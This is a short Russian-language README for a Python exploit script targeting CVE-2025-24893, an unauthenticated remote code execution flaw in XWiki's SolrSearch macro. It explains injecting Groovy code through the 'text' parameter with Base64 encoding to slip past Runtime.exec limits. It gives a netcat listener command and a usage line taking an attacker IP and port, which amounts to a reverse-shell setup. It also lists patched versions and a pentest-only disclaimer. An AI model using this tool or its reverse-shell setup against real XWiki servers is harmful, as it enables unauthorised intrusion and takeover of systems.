
Эксплойт удаленного выполнения кода (RCE) в XWiki
Эксплойт удаленного выполнения кода (RCE) в XWiki
Эксплойт на Python3 для CVE-2025-24893, критической уязвимости неаутентифицированного удаленного выполнения кода (RCE), затрагивающей платформу XWiki.
Этот скрипт эксплуатирует уязвимость инъекции кода/выражения (CWE-95) в компоненте макроса SolrSearch. Уязвимость позволяет злоумышленникам выполнять произвольный код Groovy/Java в базовой операционной системе. Эксплойт автоматически выполняет кодировку Base64, чтобы обойти ограничения интерпретации команд функции Java Runtime.getRuntime().exec().
/bin/get/Main/SolrSearch (через параметр text)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
Пример:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsЧтобы установить необходимую зависимость:
pip install requests
Обновите ваш экземпляр XWiki до одной из официальных исправленных версий: 15.10.11, 16.4.1, 16.5.0-rc-1 (или выше).
Этот скрипт разработан исключительно для образовательных целей, авторизованных аудитов безопасности и тестов на проникновение (Pentest). Автор не несет ответственности за любое неправомерное использование, ущерб или незаконные действия, вызванные этим инструментом. Использование этого скрипта против целей без предварительного разрешения строго запрещено.